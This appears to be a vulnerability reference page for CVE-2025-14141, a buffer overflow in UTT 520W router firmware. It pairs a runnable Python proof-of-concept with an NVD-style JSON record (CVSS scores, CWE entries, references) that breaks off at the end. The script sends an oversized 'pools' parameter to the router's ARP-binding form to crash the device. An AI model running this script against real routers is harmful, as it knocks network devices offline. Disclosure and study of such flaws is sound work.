CVE-2025-14141

#!/usr/bin/env python3 # CVE-2025-14141 PoC - UTT 进取 520W Buffer Overflow # Target: /goform/formArpBindConfig import requests import sys def exploit_buffer_overflow(target_ip, target_port=80): """ Exploit for CVE-2025-14141 UTT 进取 520W strcpy buffer overflow in /goform/formArpBindConfig Args: target_ip: Target router IP address target_port: Target router web port (default: 80) """ # Buffer size exceeded payload (adjust based on target) # Typical stack buffer size is 128-256 bytes, we use 512 bytes overflow_payload = "A" * 512 # Target URL url = f"http://{target_ip}:{target_port}/goform/formArpBindConfig" # Malicious POST data data = { "pools": overflow_payload, "form": "arpbind" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } try: print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload length: {len(overflow_payload)} bytes") response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[+] Request sent, status code: {response.status_code}") # Check if device is responsive after exploit check_url = f"http://{target_ip}:{target_port}/" try: check_response = requests.get(check_url, timeout=5) if check_response.status_code == 200: print("[-] Device still responsive, may need larger payload") else: print("[+] Device appears to be affected (DoS successful)") except requests.exceptions.RequestException: print("[+] Device is down - buffer overflow successful (DoS)") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2025-14141-poc.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit_buffer_overflow(target, port)

{"cve": {"id": "CVE-2025-14141", "sourceIdentifier": "[email protected]", "published": "2025-12-06T16:15:47.390", "lastModified": "2025-12-11T18:16:07.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formArpBindConfig. Executing manipulation of the argument pools can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:1.7.7-180627:*:*:*:*:*:*:*", "matchCriteriaId": "114E0E55-A7EE-4B95-8584-41F4FCED4B64"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7553AA8-68FB-4F4C-9546-F9BBB5DF17CB"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/new/13.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/13.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334529", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334529", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.698522", "source": "[email protected]", "tags": ["Third Party Advisor ... (truncated)